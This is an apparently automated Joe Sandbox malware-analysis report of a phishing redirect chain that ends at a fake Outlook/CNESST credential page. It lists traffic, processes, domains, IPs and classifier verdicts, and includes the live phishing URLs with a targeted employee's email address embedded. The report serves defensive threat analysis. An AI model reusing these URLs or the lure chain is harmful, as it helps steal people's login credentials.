Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49856 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.win@23/54@60/278
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1928,i,5407785022836219432,9275710607310727421,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1928,i,5407785022836219432,9275710607310727421,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://keyconserv.com/favicon.ico0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    unknown
    plus.l.google.com
    216.58.212.174
    truefalse
      unknown
      github.com
      140.82.121.4
      truefalse
        unknown
        klsi.ieviatind.com
        188.114.96.3
        truetrue
          unknown
          keyconserv.com
          103.83.194.55
          truefalse
            unknown
            code.jquery.com
            151.101.130.137
            truefalse
              unknown
              d2vgu95hoyrpkh.cloudfront.net
              18.245.31.78
              truefalse
                unknown
                play.google.com
                142.250.186.78
                truefalse
                  unknown
                  cdnjs.cloudflare.com
                  104.17.25.14
                  truefalse
                    unknown
                    sni1gl.wpc.upsiloncdn.net
                    152.199.21.175
                    truefalse
                      unknown
                      challenges.cloudflare.com
                      104.18.94.41
                      truefalse
                        unknown
                        get.geojs.io
                        172.67.70.233
                        truefalse
                          unknown
                          www.google.com
                          142.250.184.196
                          truefalse
                            unknown
                            5v0.philmotig.com
                            188.114.97.3
                            truefalse
                              unknown
                              d19d360lklgih4.cloudfront.net
                              108.156.39.118
                              truefalse
                                unknown
                                objects.githubusercontent.com
                                185.199.109.133
                                truefalse
                                  unknown
                                  cdn.socket.io
                                  unknown
                                  unknownfalse
                                    unknown
                                    aadcdn.msauthimages.net
                                    unknown
                                    unknownfalse
                                      unknown
                                      ok4static.oktacdn.com
                                      unknown
                                      unknownfalse
                                        unknown
                                        apis.google.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03Ttrue
                                            unknown
                                            http://keyconserv.com/favicon.icofalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://klsi.ieviatind.com/Q4NEaD7/#Qducer.kamgang@cnesst.gouv.qc.catrue
                                              unknown
                                              http://keyconserv.com/skoda/WIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==false
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.18.94.41
                                                challenges.cloudflare.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                18.245.31.78
                                                d2vgu95hoyrpkh.cloudfront.netUnited States
                                                16509AMAZON-02USfalse
                                                18.245.31.33
                                                unknownUnited States
                                                16509AMAZON-02USfalse
                                                151.101.130.137
                                                code.jquery.comUnited States
                                                54113FASTLYUSfalse
                                                108.156.39.118
                                                d19d360lklgih4.cloudfront.netUnited States
                                                16509AMAZON-02USfalse
                                                142.250.185.142
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                185.199.109.133
                                                objects.githubusercontent.comNetherlands
                                                54113FASTLYUSfalse
                                                3.162.38.21
                                                unknownUnited States
                                                16509AMAZON-02USfalse
                                                35.190.80.1
                                                a.nel.cloudflare.comUnited States
                                                15169GOOGLEUSfalse
                                                142.250.184.227
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                216.58.212.174
                                                plus.l.google.comUnited States
                                                15169GOOGLEUSfalse
                                                142.250.184.195
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.250.184.196
                                                www.google.comUnited States
                                                15169GOOGLEUSfalse
                                                104.17.24.14
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                142.250.186.78
                                                play.google.comUnited States
                                                15169GOOGLEUSfalse
                                                1.1.1.1
                                                unknownAustralia
                                                13335CLOUDFLARENETUSfalse
                                                103.83.194.55
                                                keyconserv.comUnited States
                                                132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse
                                                140.82.121.4
                                                github.comUnited States
                                                36459GITHUBUSfalse
                                                216.58.206.42
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                216.58.206.46
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.250.181.227
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                64.233.167.84
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                239.255.255.250
                                                unknownReserved
                                                unknownunknownfalse
                                                188.114.97.3
                                                5v0.philmotig.comEuropean Union
                                                13335CLOUDFLARENETUSfalse
                                                142.250.185.131
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.250.181.228
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                188.114.96.3
                                                klsi.ieviatind.comEuropean Union
                                                13335CLOUDFLARENETUStrue
                                                172.67.70.233
                                                get.geojs.ioUnited States
                                                13335CLOUDFLARENETUSfalse
                                                185.199.108.133
                                                unknownNetherlands
                                                54113FASTLYUSfalse
                                                152.199.21.175
                                                sni1gl.wpc.upsiloncdn.netUnited States
                                                15133EDGECASTUSfalse
                                                216.58.212.163
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.250.185.74
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                104.17.25.14
                                                cdnjs.cloudflare.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                104.26.0.100
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                IP
                                                192.168.2.16
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1511020
                                                Start date and time:2024-09-13 21:41:49 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                Sample URL:https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:12
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • EGA enabled
                                                Analysis Mode:stream
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal60.phis.win@23/54@60/278
                                                • Exclude process from analysis (whitelisted): svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 216.58.212.163, 142.250.185.142, 64.233.167.84, 34.104.35.123, 217.20.57.34
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • VT rate limit hit for: https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==
                                                InputOutput
                                                URL: https://klsi.ieviatind.com/Q4NEaD7/#Qducer.kamgang@cnesst.gouv.qc.ca Model: jbxai
                                                {
                                                "brand":["unknown"],
                                                "contains_trigger_text":false,
                                                "prominent_button_name":"unknown",
                                                "text_input_field_labels":["unknown"],
                                                "pdf_icon_visible":false,
                                                "has_visible_captcha":false,
                                                "has_urgent_text":false,
                                                "has_visible_qrcode":false}
                                                URL: https://klsi.ieviatind.com/Q4NEaD7/#Qducer.kamgang@cnesst.gouv.qc.ca Model: jbxai
                                                {
                                                "brand":["CLOUDFLARE"],
                                                "contains_trigger_text":false,
                                                "prominent_button_name":"unknown",
                                                "text_input_field_labels":["unknown"],
                                                "pdf_icon_visible":false,
                                                "has_visible_captcha":false,
                                                "has_urgent_text":false,
                                                "has_visible_qrcode":false}
                                                URL: https://klsi.ieviatind.com/Q4NEaD7/#Qducer.kamgang@cnesst.gouv.qc.ca Model: jbxai
                                                {
                                                "brand":["CLOUDFLARE"],
                                                "contains_trigger_text":false,
                                                "prominent_button_name":"unknown",
                                                "text_input_field_labels":["unknown"],
                                                "pdf_icon_visible":false,
                                                "has_visible_captcha":false,
                                                "has_urgent_text":false,
                                                "has_visible_qrcode":false}
                                                URL: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03T Model: jbxai
                                                {
                                                "brand":["Outlook",
                                                "Microsoft"],
                                                "contains_trigger_text":false,
                                                "prominent_button_name":"Next",
                                                "text_input_field_labels":["Sign in",
                                                "to continue to Outlook",
                                                "No account? Create one! Can't access your account?"],
                                                "pdf_icon_visible":false,
                                                "has_visible_captcha":false,
                                                "has_urgent_text":false,
                                                "has_visible_qrcode":false}
                                                URL: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03T Model: jbxai
                                                {
                                                "brand":["CNESST"],
                                                "contains_trigger_text":false,
                                                "prominent_button_name":"Sign in",
                                                "text_input_field_labels":["Enter password",
                                                "Forgot my password"],
                                                "pdf_icon_visible":false,
                                                "has_visible_captcha":false,
                                                "has_urgent_text":false,
                                                "has_visible_qrcode":false}
                                                URL: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03T Model: jbxai
                                                {
                                                "phishing_score":8,
                                                "brands":["Outlook"],
                                                "brand_matches_associated_domain":false,
                                                "reasons":"The domain name 'klsi.ieviatind.com' does not match the legitimate domain associated with the Outlook brand. The domain 'ieviatind' is not associated with Microsoft or Outlook,
                                                 which is a strong indicator of a phishing attempt. The discrepancy between the brand name and the URL suggests that the webpage may be a fake sign-in page designed to steal user login credentials.",
                                                "brand_matches":[false],
                                                "url_match":false}
                                                URL: https://klsi.ieviatind.com/264183836998261698FVNNILG37MMY43KX?lqtrfhbtirfmrafi84293514023561L300V8YCN8YO6RSXXYS03T Model: jbxai
                                                {
                                                "phishing_score":8,
                                                "brands":["CNESST"],
                                                "brand_matches_associated_domain":false,
                                                "reasons":"The domain name 'klsi.ieviatind.com' does not match the legitimate domain associated with the CNESST brand. The presence of a subdomain 'klsi' and a generic domain 'ieviatind' raises suspicions. The minimalistic design and standard login page elements do not necessarily indicate a phishing site,
                                                 but the lack of a matching domain is a significant red flag.",
                                                "brand_matches":[false],
                                                "url_match":false}
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 18:42:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2673
                                                Entropy (8bit):3.980420654377661
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:9614D5C2192B4E984E35C73021A1E80B
                                                SHA1:AAEA0994CEAF032522C30FD5A89D1EF025ADE3B1
                                                SHA-256:C969E2FEB4CB77F48A1B3D36B18CC99FE04B4587692E0461049EE54EC882C39B
                                                SHA-512:453956662EEB0C8E223CDA9991480F59649CC176607302F156E2A944F7DCCB38AA052744C8B5E7293AC8573ADB0D4A60577DBE253E848C76904A6C1983622AB0
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:L..................F.@.. ...$+.,....sr......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-YA.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-YI.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-YI.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-YI............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-YJ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............`!......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Sep 13 18:42:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2675
                                                Entropy (8bit):3.9977459911998117
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:2CC746CE5E8A4EB8DE4DAAF519C51C8C
                                                SHA1:9D4718D6CD519A0769569EE774D9F7086AC5C182
                                                SHA-256:71E47F98D3868300A657010A789F0B354DAC245BC5F66F777AB29B54A13BF3F5
                                                SHA-512:8FE33A79043EB72CC6AE6A9B7C8E24000A97776E6975340F2B45B3E1427F6A78E14FC390A77BA3064FD76B8BEBAB88A847EB13E6D34E5B8C38AEE077194FCA97
                                                Malicious:false
                                                Reputation:unknown
